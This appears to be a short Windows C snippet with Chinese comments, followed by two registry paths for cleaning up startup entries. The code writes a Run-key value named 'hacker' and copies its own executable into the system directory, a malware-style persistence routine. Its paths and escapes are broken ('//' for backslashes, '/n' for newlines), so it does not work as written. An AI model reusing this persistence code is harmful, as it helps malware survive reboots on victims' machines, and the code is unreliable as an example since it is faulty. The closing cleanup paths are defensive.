- #include <stdio.h>
- #include <windows.h>
- int main(void)
- {
- char regname[]="Software//Microsoft//Windows//CurrentVersion//Run";
- HKEY hkResult;
- int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);//打开关键字
- ret=RegSetValueEx(hkResult,"hacker",0,REG_EXPAND_SZ,(unsigned char *)"%systemroot%//hacker.exe",25);//设置键值
- if(ret==0){
- printf("success to write run key/n");
- RegCloseKey(hkResult);
- }
- else {
- printf("failed to open regedit.%d/n",ret);
- return 0;
- }
- char modlepath[256];
- char syspath[256];
- GetModuleFileName(0,modlepath,256);//取得程序名字
- GetSystemDirectory(syspath,256);
- ret=CopyFile(modlepath,strcat(syspath,"//hacker.exe"),1);
- if(ret)
- printf("%s has been copyed to sys dir %s/n",modlepath,syspath);
- else
- printf("%s is exisis",modlepath);
- return 0;
- }
- 开机启动项删除:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- "msconfig"里面多余的启动项(被禁用的启动项)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]